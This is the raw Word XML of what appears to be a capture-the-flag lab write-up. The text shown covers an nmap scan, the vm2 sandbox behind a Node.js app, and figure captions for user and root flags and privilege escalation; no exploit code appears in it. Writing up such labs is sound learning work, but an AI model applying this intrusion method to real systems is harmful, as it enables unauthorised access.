          <w:instrText xml:space="preserve"> PAGEREF _Toc157155790 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00303595">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="36981E83" w14:textId="1E9F9B12" w:rsidR="00B22A3A" w:rsidRDefault="00B22A3A">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc157155791" w:history="1">
        <w:r w:rsidRPr="00E41F5D">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Picture 9 - User flag</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc157155791 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00303595">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="04D75226" w14:textId="41D6461A" w:rsidR="00B22A3A" w:rsidRDefault="00B22A3A">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc157155792" w:history="1">
        <w:r w:rsidRPr="00E41F5D">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Picture 10 - Info usefule to privilege escalation</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc157155792 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00303595">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="53772504" w14:textId="0BC8004C" w:rsidR="00B22A3A" w:rsidRDefault="00B22A3A">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc157155793" w:history="1">
        <w:r w:rsidRPr="00E41F5D">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Picture 11 - Root's password</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc157155793 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00303595">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1CD3E08C" w14:textId="6C375033" w:rsidR="00B22A3A" w:rsidRDefault="00B22A3A">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc157155794" w:history="1">
        <w:r w:rsidRPr="00E41F5D">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Picture 12 - Log in as root</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc157155794 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00303595">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="075A2963" w14:textId="7CD7DA33" w:rsidR="00B22A3A" w:rsidRDefault="00B22A3A">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc157155795" w:history="1">
        <w:r w:rsidRPr="00E41F5D">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Picture 13 - Root flag</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc157155795 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00303595">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D0EA927" w14:textId="28F27C3B" w:rsidR="00CB3015" w:rsidRPr="009A2540" w:rsidRDefault="00B22A3A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00CB3015" w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B957F38" w14:textId="633933AE" w:rsidR="001409A8" w:rsidRPr="009A2540" w:rsidRDefault="001409A8" w:rsidP="001409A8">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc157155768"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Disclaimer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="6D772408" w14:textId="70A16508" w:rsidR="001409A8" w:rsidRPr="009A2540" w:rsidRDefault="001409A8" w:rsidP="001409A8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">I do </w:t>
      </w:r>
      <w:r w:rsidR="003E7890" w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> box to learn things and challenge myself. I’m not </w:t>
      </w:r>
      <w:r w:rsidR="004917A9" w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a kind of penetration tester</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> guru who always knows where to look for the right answer. Use it as a guide or support. </w:t>
      </w:r>
      <w:r w:rsidR="004917A9" w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Remember that i</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">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9A2540" w:rsidRDefault="00060C0E" w:rsidP="00060C0E">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc157155769"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Reconnaissance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="30C20D15" w14:textId="4FFFE4CA" w:rsidR="00060C0E" w:rsidRPr="009A2540" w:rsidRDefault="00060C0E" w:rsidP="00060C0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The result</w:t>
      </w:r>
      <w:r w:rsidR="00A84B06" w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of an initial </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> scan </w:t>
      </w:r>
      <w:r w:rsidR="00A84B06" w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D47EF5" w14:textId="77777777" w:rsidR="0056210F" w:rsidRPr="009A2540" w:rsidRDefault="0056210F" w:rsidP="0056210F">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="075AF704" wp14:editId="20E5849F">
            <wp:extent cx="5204460" cy="3859337"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="17095827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82760" name="Immagine 1709582760"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5231863" cy="3879657"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8742A6" w14:textId="41DD773A" w:rsidR="00CB3015" w:rsidRPr="009A2540" w:rsidRDefault="0056210F" w:rsidP="0056210F">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc157155783"/>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1</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> scan results</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="20C19B41" w14:textId="4FD1E2C5" w:rsidR="0056210F" w:rsidRPr="009A2540" w:rsidRDefault="0056210F" w:rsidP="00060C0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Ports open are 22, 80, 3000. So, the machine has SSH enabled and a Node.js application running on port 80. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> detected that operative system is Linux, but any other specific information about it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0DCF6A" w14:textId="165E628D" w:rsidR="0056210F" w:rsidRPr="009A2540" w:rsidRDefault="00476343" w:rsidP="0056210F">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc157155770"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Initial foothold</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="02590FC9" w14:textId="22E42DC9" w:rsidR="0056210F" w:rsidRPr="009A2540" w:rsidRDefault="0056210F" w:rsidP="00060C0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Browsing the application, I learned that it uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vm2</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> library. It is possible to use the following modules:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459E91C1" w14:textId="06427D22" w:rsidR="0056210F" w:rsidRPr="009A2540" w:rsidRDefault="0056210F" w:rsidP="0056210F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1C99D6" w14:textId="6553DD57" w:rsidR="0056210F" w:rsidRPr="009A2540" w:rsidRDefault="0056210F" w:rsidP="0056210F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>crypto</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DF4491" w14:textId="049623D6" w:rsidR="0056210F" w:rsidRPr="009A2540" w:rsidRDefault="0056210F" w:rsidP="0056210F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>util</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BABC069" w14:textId="708308AB" w:rsidR="0056210F" w:rsidRPr="009A2540" w:rsidRDefault="0056210F" w:rsidP="0056210F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>events</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400F4573" w14:textId="0C6229FB" w:rsidR="0056210F" w:rsidRPr="009A2540" w:rsidRDefault="0056210F" w:rsidP="0056210F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>assert</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2ECDDF" w14:textId="74988D3D" w:rsidR="0056210F" w:rsidRPr="009A2540" w:rsidRDefault="0056210F" w:rsidP="0056210F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stream</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1974B516" w14:textId="121B7B19" w:rsidR="0056210F" w:rsidRPr="009A2540" w:rsidRDefault="0056210F" w:rsidP="0056210F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>path</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FFE168" w14:textId="5303B992" w:rsidR="0056210F" w:rsidRPr="009A2540" w:rsidRDefault="0056210F" w:rsidP="0056210F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130EBABB" w14:textId="2266073A" w:rsidR="0056210F" w:rsidRPr="009A2540" w:rsidRDefault="0056210F" w:rsidP="0056210F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>zlib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FCA6FA" w14:textId="77777777" w:rsidR="00763E93" w:rsidRPr="009A2540" w:rsidRDefault="0056210F" w:rsidP="00476343">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">So, I can’t use the module </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>child_process</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CE81DD" w14:textId="77777777" w:rsidR="00763E93" w:rsidRPr="009A2540" w:rsidRDefault="00763E93" w:rsidP="00763E93">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1184AA01" wp14:editId="43987518">
            <wp:extent cx="6111240" cy="2118360"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="17136208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2118360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
